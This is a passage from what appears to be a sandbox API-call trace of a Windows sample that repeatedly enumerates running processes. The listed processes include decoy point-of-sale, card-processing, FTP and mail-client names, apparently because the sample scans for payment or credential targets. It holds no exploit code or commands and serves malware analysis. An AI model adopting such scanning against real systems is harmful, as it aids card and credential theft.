szExeFile="OfficeClickToRun.exe")) returned 1 [0192.536] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.538] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.540] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.542] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.543] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.545] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.547] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.551] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.553] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.555] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.557] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.559] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.562] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.564] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0192.568] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0192.570] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0192.572] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0192.574] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0192.576] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0192.578] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0192.580] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0192.582] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0192.584] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0192.586] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0192.591] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0192.594] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0192.596] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0192.598] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0192.600] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0192.602] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0192.604] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0192.606] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.608] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.610] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.613] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.616] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.618] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.621] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.624] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.628] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.630] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.632] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.634] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.635] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.637] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.639] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.641] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.643] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.645] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.647] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.649] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.651] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.653] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.656] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.658] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.660] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.662] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.668] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.670] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.673] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.675] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.677] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0192.679] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0192.681] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0192.683] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0192.685] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0192.688] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0192.690] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0192.692] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0192.694] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0192.696] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0192.698] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0192.700] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0192.701] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0192.703] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.708] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.710] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.712] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0192.714] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0192.716] CloseHandle (hObject=0x2424) returned 1 [0192.717] Sleep (dwMilliseconds=0x64) [0192.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.733] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.734] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.737] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.739] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, 